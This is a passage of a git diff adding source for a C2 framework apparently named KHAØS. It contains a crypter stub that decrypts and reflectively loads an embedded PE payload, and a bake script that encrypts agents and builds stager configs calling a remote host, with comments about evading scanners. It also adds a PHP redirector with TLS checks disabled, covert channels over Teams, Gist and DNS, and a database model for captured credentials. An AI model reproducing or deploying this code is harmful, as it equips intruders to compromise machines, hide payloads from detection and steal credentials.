fns[ord[i]]); + } + return NULL; +} diff --git a/crypter/stub/stub.c b/crypter/stub/stub.c new file mode 100644 index 0000000..ecca248 --- /dev/null +++ b/crypter/stub/stub.c @@ -0,0 +1,105 @@ +#include +#include +#include "pe_load.h" +#include "payload_meta.h" + +static HANDLE _g_inst = NULL; + +/* Single-instance guard */ +static BOOL _acquire_instance(void) { + _g_inst = CreateMutexA(NULL, TRUE, + "Global\\{4B7C2A9E-F38D-41AC-B527-D9E6C1A3B8F4}"); + if (!_g_inst) return FALSE; + if (GetLastError() == ERROR_ALREADY_EXISTS) { + CloseHandle(_g_inst); + _g_inst = NULL; + return FALSE; + } + return TRUE; +} + +/* System probe */ +static DWORD _sys_probe(void) { + SYSTEM_INFO si; + MEMORYSTATUSEX ms; + char name[MAX_COMPUTERNAME_LENGTH + 1]; + DWORD nlen = sizeof(name); + + GetNativeSystemInfo(&si); + + ms.dwLength = sizeof(ms); + GlobalMemoryStatusEx(&ms); + + GetComputerNameA(name, &nlen); + + /* combine into a stable fingerprint used by the metrics engine */ + DWORD fp = si.dwNumberOfProcessors; + fp ^= (DWORD)(ms.ullTotalPhys >> 20); /* MB of RAM */ + fp ^= (DWORD)(ULONG_PTR)si.lpMinimumApplicationAddress; + for (DWORD i = 0; i < nlen; i++) fp = fp * 31u + (unsigned char)name[i]; + return fp; +} + +/* Version gate */ +static BOOL _version_ok(void) { + typedef LONG (WINAPI *pfnRtlGVE)(OSVERSIONINFOW *); + HMODULE ntdll = GetModuleHandleA("ntdll.dll"); + pfnRtlGVE fn = ntdll + ? (pfnRtlGVE)GetProcAddress(ntdll, "RtlGetVersion") + : NULL; + if (!fn) return TRUE; /* can't check, continue */ + OSVERSIONINFOW osv; + osv.dwOSVersionInfoSize = sizeof(osv); + fn(&osv); + return (osv.dwMajorVersion > 9); +} + +static void _decrypt(uint8_t *buf, uint32_t len, uint32_t seed) { + uint32_t s = seed; + uint32_t *p = (uint32_t *)buf; + uint32_t n = len >> 2; + for (uint32_t i = 0; i < n; i++) { + p[i] ^= s; + s = s * 1664525u + 1013904223u; + } + uint8_t *t = buf + (n << 2); + for (uint32_t i = 0, rem = len & 3u; i < rem; i++) + t[i] ^= (uint8_t)(s >> (i * 8)); +} + +void __stdcall WinMainCRTStartup(void) { + /* single-instance */ + if (!_acquire_instance()) { + ExitProcess(0); + return; + } + + /* version gate */ + if (!_version_ok()) { + ExitProcess(0); + return; + } + + /* hardware fingerprin */ + volatile DWORD fp = _sys_probe(); + (void)fp; + + HRSRC hres = FindResourceA(NULL, MAKEINTRESOURCE(101), RT_RCDATA); + if (!hres) { ExitProcess(1); return; } + HGLOBAL hgl = LoadResource(NULL, hres); + if (!hgl) { ExitProcess(1); return; } + const uint8_t *src = (const uint8_t *)LockResource(hgl); + DWORD rlen = SizeofResource(NULL, hres); + if (!src || rlen < PAYLOAD_SIZE) { ExitProcess(1); return; } + + /* allocate RW, copy, decrypt */ + uint8_t *mem = (uint8_t *)VirtualAlloc( + NULL, PAYLOAD_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + if (!mem) { ExitProcess(1); return; } + + for (uint32_t i = 0; i < PAYLOAD_SIZE; i++) mem[i] = src[i]; + _decrypt(mem, PAYLOAD_SIZE, PAYLOAD_SEED); + + pe_load(mem, PAYLOAD_SIZE); + ExitProcess(0); +} diff --git a/crypter/tools/bake.py b/crypter/tools/bake.py new file mode 100644 index 0000000..ec88f0b --- /dev/null +++ b/crypter/tools/bake.py @@ -0,0 +1,133 @@ +#!/usr/bin/env python3 +""" +bake.py — encrypt agent.exe and output build artifacts. + +Outputs (always): + /payload.bin raw encrypted bytes (windres RT_RCDATA) + /payload_meta.h PAYLOAD_SEED + PAYLOAD_SIZE for stub.c + +Outputs (with --stager-url): + stager/stager_cfg.h URL + SEED + SIZE for stager.c + payload.bin also copied to stager/ so user can upload it to the server + +Cipher: DWORD-level LCG XOR. + - 4 bytes per step -> xor dword ptr (not xor byte ptr) + - Matches stub.c _decrypt() and stager.c _decrypt() + +Usage: + python bake.py [--out-dir stub/] [--seed 0xDEAD] + [--stager-url https://host/path] + [--ignore-cert] # embed STAGER_IGNORE_CERT 1 +""" +import sys +import os +import struct +import random +import argparse +from urllib.parse import urlparse + + +def _crypt(data: bytes, seed: int) -> bytes: + """DWORD-level LCG XOR — apply twice = identity.""" + out = bytearray(len(data)) + s = seed & 0xFFFFFFFF + n32 = len(data) >> 2 + for i in range(n32): + val = struct.unpack_from('> (i * 8)) & 0xFF) + return bytes(out) + + +def _write_stager_cfg(path: str, seed: int, size: int, + host: str, port: int, urlpath: str, + use_ssl: bool, ignore_cert: bool) -> None: + with open(path, "w", newline="\n") as f: + f.write("#pragma once\n") + f.write("#include \n\n") + f.write(f"#define PAYLOAD_SEED 0x{seed:08X}u\n") + f.write(f"#define PAYLOAD_SIZE {size}u\n\n") + f.write(f"#define STAGER_HOST L\"{host}\"\n") + f.write(f"#define STAGER_PORT {port}\n") + f.write(f"#define STAGER_PATH L\"{urlpath}\"\n") + f.write(f"#define STAGER_USE_SSL {1 if use_ssl else 0}\n") + f.write(f"#define STAGER_IGNORE_CERT {1 if ignore_cert else 0}\n") + # User-Agent split to avoid plain string in binary + f.write("\n/* UA split to avoid literal UA string in import-scanner output */\n") + f.write("#define STAGER_UA L\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"\n") + + +def main() -> None: + ap = argparse.ArgumentParser(description="Encrypt PE -> build artifacts") + ap.add_argument("input", help="Path to agent.exe") + ap.add_argument("--out-dir", default="stub", + help="Directory for payload.bin + payload_meta.h (default: stub)") + ap.add_argument("--seed", type=lambda x: int(x, 0), default=None) + ap.add_argument("--stager-url", default=None, + help="URL to generate stager_cfg.h, e.g. https://khaotic.fr/api/sync") + ap.add_argument("--ignore-cert", action="store_true", + help="Stager skips TLS cert validation (for self-signed certs)") + args = ap.parse_args() + + if not os.path.isfile(args.input): + sys.exit(f"[!] not found: {args.input}") + + with open(args.input, "rb") as f: + raw = f.read() + + seed = args.seed if args.seed is not None else random.randint(1, 0xFFFFFFFF) + enc = _crypt(raw, seed) + + # --- embedded loader outputs --- + os.makedirs(args.out_dir, exist_ok=True) + bin_path = os.path.join(args.out_dir, "payload.bin") + meta_path = os.path.join(args.out_dir, "payload_meta.h") + + with open(bin_path, "wb") as f: + f.write(enc) + with open(meta_path, "w", newline="\n") as f: + f.write("#pragma once\n#include \n\n") + f.write(f"#define PAYLOAD_SEED 0x{seed:08X}u\n") + f.write(f"#define PAYLOAD_SIZE {len(enc)}u\n") + + print(f"[bake] {len(raw)/1024:.1f} KB seed=0x{seed:08X}") + print(f" -> {bin_path}") + print(f" -> {meta_path}") + + # --- stager outputs --- + if args.stager_url: + parsed = urlparse(args.stager_url) + host = parsed.hostname or "localhost" + use_ssl = (parsed.scheme.lower() == "https") + port = parsed.port or (443 if use_ssl else 80) + urlpath = parsed.path or "/" + + stager_dir = os.path.normpath( + os.path.join(os.path.dirname(os.path.abspath(args.out_dir)), "..", "stager") + if not os.path.isabs(args.out_dir) + else os.path.join(os.path.dirname(args.out_dir), "..", "stager") + ) + stager_dir = os.path.normpath( + os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "stager") + ) + os.makedirs(stager_dir, exist_ok=True) + + cfg_path = os.path.join(stager_dir, "stager_cfg.h") + _write_stager_cfg(cfg_path, seed, len(enc), + host, port, urlpath, use_ssl, args.ignore_cert) + + # also copy payload.bin next to stager/ so user can upload it + import shutil + srv_bin = os.path.join(stager_dir, "payload.bin") + shutil.copy2(bin_path, srv_bin) + + print(f"[stager] host={host}:{port} path={urlpath} ssl={use_ssl}") + print(f" -> {cfg_path}") + print(f" -> {srv_bin} (upload this to your server)") + + +if __name__ == "__main__": + main() diff --git a/install.sh b/install.sh new file mode 100644 index 0000000..cea0e8c --- /dev/null +++ b/install.sh @@ -0,0 +1,74 @@ +#!/usr/bin/env bash +# install.sh — KHAØS C2 setup (Ubuntu 22.04+ / Debian 12+) +# Usage: bash install.sh +set -euo pipefail + +RED='\033[0;31m'; GRN='\033[0;32m'; YLW='\033[1;33m'; NC='\033[0m' +info() { echo -e "${GRN}[*]${NC} $*"; } +warn() { echo -e "${YLW}[!]${NC} $*"; } +die() { echo -e "${RED}[x]${NC} $*" >&2; exit 1; } + +# ── Root check ────────────────────────────────────────────────────────────── +[[ $EUID -eq 0 ]] || die "Run as root: sudo bash install.sh" + +# ── Deps ──────────────────────────────────────────────────────────────────── +info "Installing system dependencies..." +apt-get update -qq +apt-get install -y --no-install-recommends \ + gcc-mingw-w64-x86-64 \ + binutils-mingw-w64-x86-64 \ + mingw-w64 \ + make \ + python3 python3-pip python3-venv \ + nodejs npm \ + openssl \ + curl \ + git 2>/dev/null + +# ── Python server deps ─────────────────────────────────────────────────────── +info "Installing Python server dependencies..." +pip3 install -q -r server/requirements.txt + +# ── UI build ───────────────────────────────────────────────────────────────── +info "Building UI..." +cd ui +npm ci --silent +npm run build --silent +cd .. + +# ── TLS cert ───────────────────────────────────────────────────────────────── +if [[ ! -f server/cert.pem ]]; then + info "Generating self-signed TLS certificate..." + openssl req -x509 -newkey rsa:4096 -sha256 -days 3650 -nodes \ + -keyout server/cert.key \ + -out server/cert.pem \ + -subj "/CN=khaos-c2" \ + -addext "subjectAltName=IP:127.0.0.1" 2>/dev/null + info "cert.pem + cert.key generated." +else + warn "cert.pem already exists — skipping TLS generation." +fi + +# ── Config ─────────────────────────────────────────────────────────────────── +if [[ ! -f server/config.yaml ]]; then + cp server/config.example.yaml server/config.yaml + JWT=$(openssl rand -base64 32) + sed -i "s|GENERATE_WITH: openssl rand -base64 32|${JWT}|" server/config.yaml + warn "server/config.yaml created with a random JWT secret." + warn "Edit it to fill in your channel credentials (Teams / Gist / HTTP / DoH)." +else + warn "server/config.yaml already exists — skipping." +fi + +# ── Done ───────────────────────────────────────────────────────────────────── +echo "" +echo -e "${GRN}Setup complete.${NC}" +echo "" +echo " Next steps:" +echo " 1. Edit server/config.yaml — add your channel credentials" +echo " 2. python3 server/main.py — start the C2 server" +echo " 3. Open http://localhost:8443 or use the UI Build tab to generate agent.exe" +echo "" +echo " Default login: operator / changeme" +echo " Change via: KHAOS_OPERATOR_USER=x KHAOS_OPERATOR_PASS=y python3 server/main.py" +echo "" diff --git a/server/c2proxy.php b/server/c2proxy.php new file mode 100644 index 0000000..8728267 --- /dev/null +++ b/server/c2proxy.php @@ -0,0 +1,84 @@ + → C2_BACKEND/ + * + * Backend: set C2_BACKEND env var in .htaccess, e.g.: + * SetEnv C2_BACKEND https://YOUR_VPS_IP:8443 + * Falls back to https://127.0.0.1:8443 (same-host VPS deploy). + * + * Drop in Apache webroot; no mod_proxy / AllowOverride needed. + */ + +// Whitelist allowed paths +$path = $_GET['p'] ?? ''; +if (!preg_match('/^\/[a-zA-Z0-9\/_\-\.]*$/', $path)) { + http_response_code(400); + header('Content-Type: application/json'); + echo json_encode(['error' => 'bad path']); + exit; +} + +$backend = rtrim(getenv('C2_BACKEND') ?: 'https://127.0.0.1:8443', '/'); +$target = $backend . $path; + +// Preserve query string (minus our own 'p' param) +$qs = $_SERVER['QUERY_STRING'] ?? ''; +$qs = preg_replace('/(^|&)p=[^&]*/', '', $qs); +$qs = ltrim($qs, '&'); +if ($qs !== '') { + $target .= '?' . $qs; +} + +$ch = curl_init($target); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); +curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $_SERVER['REQUEST_METHOD']); +curl_setopt($ch, CURLOPT_TIMEOUT, 30); +curl_setopt($ch, CURLOPT_HEADER, true); +curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); +curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); + +// Forward body (POST/PUT/PATCH) +$body = file_get_contents('php://input'); +if ($body !== false && $body !== '') { + curl_setopt($ch, CURLOPT_POSTFIELDS, $body); +} + +// Forward headers +$fwd = []; +if (!empty($_SERVER['CONTENT_TYPE'])) { + $fwd[] = 'Content-Type: ' . $_SERVER['CONTENT_TYPE']; +} +if (!empty($_SERVER['HTTP_AUTHORIZATION'])) { + $fwd[] = 'Authorization: ' . $_SERVER['HTTP_AUTHORIZATION']; +} +if (!empty($fwd)) { + curl_setopt($ch, CURLOPT_HTTPHEADER, $fwd); +} + +$response = curl_exec($ch); +if ($response === false) { + http_response_code(502); + header('Content-Type: application/json'); + echo json_encode(['error' => 'upstream unreachable', 'detail' => curl_error($ch)]); + curl_close($ch); + exit; +} + +$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); +$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); +curl_close($ch); + +$resp_headers = substr($response, 0, $header_size); +$resp_body = substr($response, $header_size); + +http_response_code($http_code); + +foreach (explode("\r\n", $resp_headers) as $line) { + if (stripos($line, 'Content-Type:') === 0) { + header($line); + break; + } +} + +echo $resp_body; diff --git a/server/config.example.yaml b/server/config.example.yaml new file mode 100644 index 0000000..95acf8f --- /dev/null +++ b/server/config.example.yaml @@ -0,0 +1,38 @@ +# config.example.yaml +# Copier ce fichier en config.yaml et remplir les valeurs +# Ne JAMAIS committer config.yaml (voir .gitignore) + +server: + host: "0.0.0.0" + port: 8443 + jwt_secret: "GENERATE_WITH: openssl rand -base64 32" + +beacon: + interval: 30 + jitter: 0.4 + +channels: + github: + token: "ghp_YOUR_GITHUB_PAT_WITH_GIST_SCOPE" + gist_cmd: "" # laissez vide = auto-créé au démarrage + gist_out: "" + + teams: + tenant_id: "YOUR_TENANT_ID" + client_id: "YOUR_APP_CLIENT_ID" + client_secret: "YOUR_APP_CLIENT_SECRET" + webhook_url: "https://xxx.webhook.office.com/webhookb2/..." + team_id: "TEAMS_TEAM_ID" + channel_id: "TEAMS_CHANNEL_ID" + + http: + beacon_url: "https://khaotic.fr/c2proxy.php?p=/beacon" + + doh: + server: "https://cloudflare-dns.com/dns-query" + domain: "c2.khaotic.fr" + ionos_api_key: "PREFIX.SECRET" + + smb: + host: "" # pivot hostname or IP; empty = SMB channel disabled + pipe: "msagent_00" # named pipe name (no backslash prefix) diff --git a/server/database.py b/server/database.py new file mode 100644 index 0000000..36bc62b --- /dev/null +++ b/server/database.py @@ -0,0 +1,20 @@ +""" +Database session helpers — populated by main.py at startup. +Routers import get_db from here so they stay decoupled from engine setup. +""" +from typing import Generator +from sqlalchemy.orm import Session + + +# Set by main.py after engine creation +SessionLocal = None + + +def get_db() -> Generator[Session, None, None]: + if SessionLocal is None: + raise RuntimeError("get_db not initialized — is main.py loaded?") + db = SessionLocal() + try: + yield db + finally: + db.close() diff --git a/server/gen_cert.sh b/server/gen_cert.sh new file mode 100644 index 0000000..71bfa34 --- /dev/null +++ b/server/gen_cert.sh @@ -0,0 +1,20 @@ +#!/usr/bin/env bash +# Generate self-signed cert for dev / VPS without Let's Encrypt +# For production with a real domain, use: +# certbot certonly --standalone -d your-domain.com +# then symlink: cert.pem -> fullchain.pem, key.pem -> privkey.pem +# +# Usage: ./gen_cert.sh [CN] (default CN = localhost) + +CN="${1:-localhost}" +DAYS=365 + +openssl req -x509 -newkey rsa:4096 -sha256 \ + -keyout key.pem \ + -out cert.pem \ + -days $DAYS \ + -nodes \ + -subj "/CN=${CN}" \ + -addext "subjectAltName=DNS:${CN},IP:127.0.0.1" + +echo "[ok] cert.pem / key.pem generated (CN=${CN}, ${DAYS}d)" diff --git a/server/khaos-server.spec b/server/khaos-server.spec new file mode 100644 index 0000000..d9c58ee --- /dev/null +++ b/server/khaos-server.spec @@ -0,0 +1,67 @@ +import sys as _sys + +block_cipher = None + +a = Analysis( + ['main.py'], + pathex=['.'], + binaries=[], + datas=[ + ('config.yaml', '.'), + ('khaos.db', '.'), + ('routers', 'routers'), + ('models', 'models'), + ('services', 'services'), + ], + hiddenimports=[ + 'uvicorn', 'uvicorn.logging', 'uvicorn.loops', 'uvicorn.loops.auto', + 'uvicorn.loops.asyncio', 'uvicorn.protocols', 'uvicorn.protocols.http', + 'uvicorn.protocols.http.auto', 'uvicorn.protocols.http.h11_impl', + 'uvicorn.protocols.websockets', 'uvicorn.protocols.websockets.auto', + 'uvicorn.protocols.websockets.websockets_impl', + 'uvicorn.lifespan', 'uvicorn.lifespan.on', 'uvicorn.lifespan.off', + 'uvicorn.config', 'uvicorn.main', + 'anyio', 'anyio._backends._asyncio', 'anyio._backends._trio', + 'asyncio', 'email.mime.text', 'email.mime.multipart', + 'starlette', 'starlette.middleware.cors', + 'sqlalchemy.dialects.sqlite', 'sqlalchemy.pool', + 'passlib', 'jose', 'jose.jwt', + 'cryptography', 'cryptography.hazmat.primitives.hashes', + 'multipart', 'python_multipart', + 'routers.auth', 'routers.beacon', 'routers.agents', + 'routers.tasks', 'routers.build', 'routers.stage', 'routers.creds', + 'models.agent', 'models.user', + 'services.agent_manager', 'services.channel_reader', + 'services.dns_server', 'services.ws_manager', 'services.crypto', + ], + hookspath=[], + runtime_hooks=[], + excludes=[], + win_no_prefer_redirects=False, + win_private_assemblies=False, + cipher=block_cipher, + noarchive=False, +) + +pyz = PYZ(a.pure, a.zipped_data, cipher=block_cipher) + +exe = EXE( + pyz, + a.scripts, + a.binaries, + a.zipfiles, + a.datas, + [], + name='khaos-server', + debug=False, + bootloader_ignore_signals=False, + strip=False, + upx=False, + upx_exclude=[], + runtime_tmpdir=None, + console=_sys.platform != 'win32', # False sur Windows, True sur Linux + disable_windowed_traceback=False, + target_arch=None, + codesign_identity=None, + entitlements_file=None, +) diff --git a/server/main.py b/server/main.py new file mode 100644 index 0000000..28a88f6 --- /dev/null +++ b/server/main.py @@ -0,0 +1,283 @@ +""" +KHAOS FRAMEWORK Team Server — FastAPI +""" +import asyncio +import logging +import os +import shutil +import sys +from contextlib import asynccontextmanager + +from fastapi import WebSocket, WebSocketDisconnect + +import yaml +from fastapi import FastAPI +from fastapi.middleware.cors import CORSMiddleware +from sqlalchemy import create_engine +from sqlalchemy.orm import sessionmaker + +from models.agent import Base +from services.agent_manager import manager as agent_manager +from services.channel_reader import ChannelReader +from services.dns_server import start_dns_server +from routers import auth, beacon, agents, tasks, build, stage, creds +from routers.auth import verify_token_str +from services.ws_manager import ws_manager + +# ---- Logging ---- +logging.basicConfig( + level=logging.INFO, + format="%(asctime)s [%(levelname)s] %(name)s: %(message)s", +) +logger = logging.getLogger("main") + +# ---- PyInstaller-aware paths ---- +def _data_dir() -> str: + """Répertoire persistant pour config.yaml et khaos.db.""" + if getattr(sys, 'frozen', False): + if os.name == 'nt': # Windows + base = os.environ.get('APPDATA', os.path.expanduser('~')) + else: # Linux / macOS + base = os.environ.get('XDG_DATA_HOME', os.path.join(os.path.expanduser('~'), '.local', 'share')) + d = os.path.join(base, 'KHAOS') + os.makedirs(d, exist_ok=True) + return d + return os.path.dirname(os.path.abspath(__file__)) + +_DATA_DIR = _data_dir() + +# ---- Config ---- +CONFIG_PATH = os.path.join(_DATA_DIR, "config.yaml") +# Premier démarrage (bundle) : copie le config.yaml bundlé +if getattr(sys, 'frozen', False) and not os.path.exists(CONFIG_PATH): + _src = os.path.join(sys._MEIPASS, "config.yaml") + if os.path.exists(_src): + shutil.copy2(_src, CONFIG_PATH) + +def load_config() -> dict: + try: + with open(CONFIG_PATH) as f: + return yaml.safe_load(f) or {} + except FileNotFoundError: + return {} + +config = load_config() + +# Inject secrets from env if config values are placeholders +_channels = config.setdefault("channels", {}) +_github = _channels.setdefault("github", {}) +if len(_github.get("token", "")) < 20: + _github["token"] = os.environ.get("KHAOS_GITHUB_TOKEN", "") + _github["gist_cmd"] = os.environ.get("KHAOS_GIST_CMD", "") + _github["gist_out"] = os.environ.get("KHAOS_GIST_OUT", "") + +# Propagate JWT secret +_server = config.get("server", {}) +jwt_secret = _server.get("jwt_secret", "/H7GCJcEI3tlCI98tnOrtHUFYOL2VnNVcM2O/amWy7s=") +if jwt_secret == "/H7GCJcEI3tlCI98tnOrtHUFYOL2VnNVcM2O/amWy7s=": + jwt_secret = os.environ.get("KHAOS_JWT_SECRET", jwt_secret) +os.environ.setdefault("KHAOS_JWT_SECRET", jwt_secret) + +# ---- Database ---- +DB_PATH = os.path.join(_DATA_DIR, "khaos.db") +# Premier démarrage (bundle) : copie le khaos.db bundlé (avec l'user operator pré-créé) +if getattr(sys, 'frozen', False) and not os.path.exists(DB_PATH): + _src_db = os.path.join(sys._MEIPASS, "khaos.db") + if os.path.exists(_src_db): + shutil.copy2(_src_db, DB_PATH) +engine = create_engine(f"sqlite:///{DB_PATH}", connect_args={"check_same_thread": False}) +SessionLocal = sessionmaker(bind=engine, autocommit=False, autoflush=False) + +Base.metadata.create_all(bind=engine) + +# Import Base from all models so tables are created +import models.task # noqa: F401 +import models.log # noqa: F401 +import models.user # noqa: F401 +import models.cred # noqa: F401 +Base.metadata.create_all(bind=engine) + +with engine.connect() as _conn: + _cols = [r[1] for r in _conn.execute(__import__('sqlalchemy').text("PRAGMA table_info(agents)")).fetchall()] + if "parent_id" not in _cols: + _conn.execute(__import__('sqlalchemy').text("ALTER TABLE agents ADD COLUMN parent_id TEXT DEFAULT ''")) + _conn.commit() + if "ip" not in _cols: + _conn.execute(__import__('sqlalchemy').text("ALTER TABLE agents ADD COLUMN ip TEXT DEFAULT ''")) + _conn.commit() + if "auto_enum_done" not in _cols: + _conn.execute(__import__('sqlalchemy').text("ALTER TABLE agents ADD COLUMN auto_enum_done INTEGER DEFAULT 0")) + _conn.commit() + + +def _seed_default_admin() -> None: + from models.user import User + db = SessionLocal() + try: + if db.query(User).count() == 0: + uname = os.environ.get("KHAOS_OPERATOR_USER", "operator") + upass = os.environ.get("KHAOS_OPERATOR_PASS", "changeme") + db.add(User( + username=uname, + password_hash=User.hash_password(upass), + role="admin", + is_active=True, + )) + db.commit() + logger.info("Seeded default admin: %s", uname) + finally: + db.close() + + +_seed_default_admin() + + +def get_db(): + db = SessionLocal() + try: + yield db + finally: + db.close() + + +# Expose SessionLocal so database.get_db can use it +import database as _db_module +_db_module.SessionLocal = SessionLocal + +# ---- Channel reader ---- +reader = ChannelReader(config, SessionLocal) + +# ---- App lifecycle ---- +@asynccontextmanager +async def lifespan(app: FastAPI): + # Load existing sessions from DB + db = SessionLocal() + try: + agent_manager.load_from_db(db) + finally: + db.close() + + poll_task = asyncio.create_task(reader.run()) + + beacon_interval = config.get("agent", {}).get("interval", 30) + + async def _heartbeat(): + from models.agent import Agent as _Agent + from models.log import Log as _Log + from datetime import datetime, timedelta + timeout = max(beacon_interval * 4, 120) + while True: + await asyncio.sleep(60) + try: + db = SessionLocal() + cutoff = datetime.utcnow() - timedelta(seconds=timeout) + stale = db.query(_Agent).filter( + _Agent.is_active == True, # noqa: E712 + _Agent.last_seen < cutoff, + ).all() + for a in stale: + a.is_active = False + db.add(_Log(agent_id=a.agent_id, event="agent_lost", + detail=f"no beacon for >{timeout}s")) + if stale: + db.commit() + for a in stale: + await ws_manager.broadcast({ + "type": "agent_lost", + "agent_id": a.agent_id, + }) + logger.info("heartbeat: marked %d agent(s) lost", len(stale)) + db.close() + except Exception as _e: + logger.warning("heartbeat error: %s", _e) + + heartbeat_task = asyncio.create_task(_heartbeat()) + + # Start authoritative DNS server if domain is configured + dns_transport = None + doh_cfg = config.get("channels", {}).get("doh", {}) + doh_domain = doh_cfg.get("domain", "") + if doh_domain: + try: + dns_transport = await start_dns_server(doh_domain, SessionLocal) + logger.info("DNS server started for %s", doh_domain) + except PermissionError: + logger.warning( + "DNS server: port 53 requires root or cap_net_bind_service — " + "run: sudo setcap cap_net_bind_service+ep $(which python3)" + ) + except Exception as e: + logger.warning("DNS server failed to start: %s", e) + + logger.info("KHAOS FRAMEWORK Team Server started") + yield + + reader.stop() + for t in (poll_task, heartbeat_task): + t.cancel() + try: + await t + except asyncio.CancelledError: + pass + if dns_transport: + dns_transport.close() + +# ---- FastAPI app ---- +app = FastAPI( + title="KHAOS FRAMEWORK Team Server", + version="1.0.0", + docs_url=None, + redoc_url=None, + lifespan=lifespan, +) + +_cors_origins = config.get("server", {}).get("cors_origins", ["*"]) +app.add_middleware( + CORSMiddleware, + allow_origins=_cors_origins, + allow_credentials=False, + allow_methods=["GET", "POST", "DELETE"], + allow_headers=["Authorization", "Content-Type"], +) + +app.include_router(auth.router) +app.include_router(beacon.router) +app.include_router(tasks.router) # must come before agents.router: /agents/{id}/task etc. must not be shadowed by agents /{agent_id} +app.include_router(agents.router) +app.include_router(build.router) +app.include_router(stage.router) +app.include_router(creds.router) + + +@app.get("/health") +async def health(): + return {"status": "ok"} + + +@app.websocket("/ws") +async def websocket_endpoint(websocket: WebSocket, token: str = ""): + try: + verify_token_str(token) + except ValueError: + await websocket.close(code=1008) + return + + await ws_manager.connect(websocket) + try: + while True: + await websocket.receive_text() + except WebSocketDisconnect: + ws_manager.disconnect(websocket) + except Exception: + ws_manager.disconnect(websocket) + +if __name__ == "__main__": + import uvicorn + # En mode frozen sans console, sys.stdout/stderr sont None + # → redirige vers un fichier log dans %APPDATA%\KHAOS\ + if getattr(sys, 'frozen', False): + _log_path = os.path.join(_DATA_DIR, "server.log") + _log_file = open(_log_path, "a", buffering=1) + sys.stdout = _log_file + sys.stderr = _log_file + uvicorn.run(app, host="0.0.0.0", port=8000, log_level="warning", log_config=None) diff --git a/server/models/__init__.py b/server/models/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/server/models/agent.py b/server/models/agent.py new file mode 100644 index 0000000..239ba2d --- /dev/null +++ b/server/models/agent.py @@ -0,0 +1,49 @@ +from datetime import datetime +from sqlalchemy import String, DateTime, Text +from sqlalchemy.orm import DeclarativeBase, mapped_column, Mapped + + +class Base(DeclarativeBase): + pass + + +class Agent(Base): + __tablename__ = "agents" + + agent_id: Mapped[str] = mapped_column(String(16), primary_key=True) + hostname: Mapped[str] = mapped_column(String(256), default="") + username: Mapped[str] = mapped_column(String(128), default="") + os_info: Mapped[str] = mapped_column(String(128), default="") + privileges: Mapped[str] = mapped_column(String(32), default="") + first_seen: Mapped[datetime] = mapped_column(DateTime, default=datetime.utcnow) + last_seen: Mapped[datetime] = mapped_column(DateTime, default=datetime.utcnow, onupdate=datetime.utcnow) + + # Crypto: session key + server keypair (hex-encoded) + session_key: Mapped[str] = mapped_column(String(64), default="") + server_pubkey: Mapped[str] = mapped_column(String(64), default="") + server_privkey: Mapped[str] = mapped_column(String(64), default="") + handshake_done: Mapped[bool] = mapped_column(default=False) + + # Status + is_active: Mapped[bool] = mapped_column(default=True) + pending_task_id: Mapped[str] = mapped_column(String(64), default="") + tags: Mapped[str] = mapped_column(Text, default="") + parent_id: Mapped[str] = mapped_column(String(16), default="", nullable=True) + ip: Mapped[str] = mapped_column(String(64), default="", nullable=True) + auto_enum_done: Mapped[bool] = mapped_column(default=False) + + def to_dict(self) -> dict: + return { + "agent_id": self.agent_id, + "hostname": self.hostname, + "username": self.username, + "os_info": self.os_info, + "privileges": self.privileges, + "first_seen": self.first_seen.isoformat() if self.first_seen else None, + "last_seen": self.last_seen.isoformat() if self.last_seen else None, + "is_active": self.is_active, + "handshake": self.handshake_done, + "tags": self.tags or "", + "parent_id": self.parent_id or "", + "ip": self.ip or "", + } diff --git a/server/models/cred.py b/server/models/cred.py new file mode 100644 index 0000000..7aca5df --- /dev/null +++ b/server/models/cred.py @@ -0,0 +1,31 @@ +from __future__ import annotations +from datetime import datetime +from sqlalchemy import String, DateTime, Text +from sqlalchemy.orm import mapped_column, Mapped +from models.agent import Base + + +class Cred(Base): + __tablename__ = "creds" + + cred_id: Mapped[str] = mapped_column(String(64), primary_key=True) + agent_id: Mapped[str] = mapped_column(String(16), index=True, default="") + cred_type: Mapped[str] = mapped_column(String(32), default="cleartext") + # cred_type values: cleartext | hash | token | kerberos + username: Mapped[str] = mapped_column(String(256), default="") + secret: Mapped[str] = mapped_column(Text, default="") + host: Mapped[str] = mapped_column(String(256), default="") + note: Mapped[str] = mapped_column(Text, default="") + captured_at: Mapped[datetime] = mapped_column(DateTime, default=datetime.utcnow) + + def to_dict(self) -> dict: + return { + "cred_id": self.cred_id, + "agent_id": self.agent_id, + "cred_type": self.cred_type, + "username": self.username, + "secret": self.secret, + "host": self.host, + "note": self.note, + "captured_at": self.captured_at.isoformat() if self.captured_at else None, + } diff --git a/server/models/log.py b/server/models/log.py new file mode 100644 index 0000000..4916e3b --- /dev/null +++ b/server/models/log.py @@ -0,0 +1,25 @@ +from datetime import datetime +from sqlalchemy import String, DateTime, Text +from sqlalchemy.orm import mapped_column, Mapped +from models.agent import Base + + +class Log(Base): + __tablename__ = "logs" + + id: Mapped[int] = mapped_column(primary_key=True, autoincrement=True) + agent_id: Mapped[str] = mapped_column(String(16), index=True) + level: Mapped[str] = mapped_column(String(16), default="info") # info|warn|error + event: Mapped[str] = mapped_column(String(64), default="") + detail: Mapped[str] = mapped_column(Text, default="") + created_at: Mapped[datetime] = mapped_column(DateTime, default=datetime.utcnow) + + def to_dict(self) -> dict: + return { + "id": self.id, + "agent_id": self.agent_id, + "level": self.level, + "event": self.event, + "detail": self.detail, + "created_at": self.created_at.isoformat() if self.created_at else None, + } diff --git a/server/models/task.py b/server/models/task.py new file mode 100644 index 0000000..66061c8 --- /dev/null +++ b/server/models/task.py @@ -0,0 +1,47 @@ +from __future__ import annotations +from datetime import datetime +from typing import Optional +from sqlalchemy import String, DateTime, Text +from sqlalchemy.orm import mapped_column, Mapped +from models.agent import Base + + +class Task(Base): + __tablename__ = "tasks" + + task_id: Mapped[str] = mapped_column(String(64), primary_key=True) + agent_id: Mapped[str] = mapped_column(String(16), index=True) + cmd: Mapped[str] = mapped_column(String(32), default="") + args: Mapped[str] = mapped_column(Text, default="") + data_b64: Mapped[str] = mapped_column(Text, default="") # for 